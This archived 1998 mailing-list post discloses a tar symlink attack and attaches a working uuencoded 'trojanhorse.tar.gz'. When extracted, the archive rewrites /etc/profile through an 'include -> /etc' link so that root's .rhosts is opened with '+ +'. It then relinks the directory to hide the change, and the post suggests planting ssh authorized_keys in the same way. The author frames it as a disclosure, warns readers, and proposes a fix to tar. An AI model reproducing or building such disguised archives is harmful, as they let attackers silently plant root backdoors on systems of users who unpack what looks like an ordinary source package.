Hi all !
After reading all these threads about locate, bash ..., I wondered how tar
could be abused. Although I didn't find a buffer overflow in a file or
directory name (fortunately), it came to me a way to make tar overwrite
absolute files on disk, (given the user has access to it), but I can't find
how to protect from this because it's based on a perfectly legal behaviour.
It's based on the symlinks.
Here's an example of a tar file which will overwrite your /etc/profile to
make it add "+ +" to root's .rhosts next time he logs in. So if part of its
directory architecture is included in any package, a root user could un-tar
it to any location without really noticeing that /etc/profile has been
rewritten.
Of course it would be simpler with only two files, one link to /root and a
.rhosts, but that becomes really evident when you consult the file before
extracting it. Note that it could also be interesting to write a key to
$ANYUSER/.ssh/authorized_keys !
The output of the tar ztvf gives this:
$ tar ztvf trojanhorse.tar.gz
drwxr-xr-x willy/users 0 Sep 21 11:43 1998 Src/
-rw-r--r-- willy/users 46 Sep 21 11:43 1998 Src/Makefile
-rw-r--r-- willy/users 17 Sep 21 11:42 1998 Src/dummy.c
lrwxrwxrwx willy/users 0 Sep 21 11:45 1998 src -> Src
drwxr-xr-x willy/users 0 Sep 21 11:41 1998 Include/
-rw-r--r-- willy/users 30 Sep 21 11:41 1998 Include/config.h
lrwxrwxrwx willy/users 0 Sep 21 11:34 1998 include -> /etc
-rw-r--r-- willy/users 758 Sep 21 11:40 1998 include/profile
lrwxrwxrwx willy/users 0 Sep 21 11:53 1998 include -> Include
The "src" and "Src" directories are just here to make detection less evident.
This is the "include" link to /etc which does the work. After processing,
it's re-linked to "Include" so when tar ends, no trace is kept of what has
been done, except in /etc/profile.
The file comes here, uuencoded. PLEASE SAVE YOUR /etc/profile before
extracting it to any place (/tmp, for example). I think that if tar gave
just a warning each time a file is written after a symlink, and each time
a symlink points to /something, this could be good, but perhaps someone
would have a better idea.
Willy
--
+----------------------------------------------------------------------------+
| Willy Tarreau - tarreauat_private - http://www-miaif.lip6.fr/willy/ |
| System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ |
| Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 |
+----------------------------------------------------------------------------+
begin 644 trojanhorse.tar.gz
M'XL(".$B!C8"`W1R;VIA;FAO<G-E+G1A<@#M6%U/VS`4S6O]*^XR)#10&]MM
M$HVI:#S`J`0#+4S[ZB1"XC8>25S9"="7_?;9:4O'-.WCH65:?5YBQS?.]3T^
MOC>)9.(Y*P;T<.C[X```Z?4>7.?``$&`28^$0=#3HYCZ@0.^LP;4JHHE@'/+
M\WSZ2SLFE?/?(=+\G\;7;,1SMJIW$(R#'WA_R+\?+/GW0SU*0L,_MORO'$\A
MK8MB"L5\#R`4Y_D>:KUD228,-^X'44,N%(,G+G(L_D/]-SN@DSB/IG]*EOJG
MOM%_@+'5_SK@[<P/`"-^V/&LQ#<+2B8K?P>A.`S#/ZG_*";8Z!^'.'2`1FMP
M;L/U/RB3O$[92K\!_J;^]W%3_Q%LZ_^U\I^(<L3'G>Q1\G]W6?_[5.\%0GV_
M:_/_FO+_%QT"J`1,Z@KB61V0,6F+@8T`G^G_'\G_)`A\W-3_@:[_J<>JQ.I_
M'?Q[$RE6]@OH-^<_Z0;+\[]'N^;\#[K$GO_K^?]C1+:@'Z&G$$U5Q0JXY2D#
M5MYP*<J"E3HUE"F86%7U!+3Y6,:%TN9'=9E47)2J,8AS'BNF8"R`E[.IKV*5
MR02A\X.+X[Z[92Y[7JVD]YZ0-X%WQ4L7G4>D[WX:UB^'&0S??1X.M\!%J,YY
MP2MH)_J#H`'B(_@$ESR%]KB\A/ZL6>MF.YZW=7-<Z>T%GU]`E;$2M>HB5M>`
M,44L5^R^3RD:<83>1H=O^HMIT,G9J]<'IX?]+7,;G1X,3OJN=Q-+3TV$R+TB
MYKG7C&GOCL^BB\;XTJS!RX2JRKA@E^AX$%U$@X^'?>-UTSL:G!PN[["[B9`5
MF$"`7C@L)H+%@_#],V!>!W/'P+B$T$A(X/<!GG/72;V=CLK@!:0"M9I(M>]@
MBR\CT>KH+FKI9:>B9+-@-JO1D91"5/>66I3-[S]W%W9=V-^'KV;8ZTBS2&6&
MDPFTT]'Dat_private;2=AF+=6CI\Q_'8/_AOM.FLH#VZ&=SS%PY$>(:X@JF
MHI8P]P3VVL]<,*Q`6\'V!U%OWS"X8JR$+$ZN60I74UW2&(&;R;:;51K:;=[_
J-_,_)9B:[S_:P[K^IX,U.+?AY[^%A86%A86%A86%Q>;@&SKXX[<`*```
`
end
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:25 PDT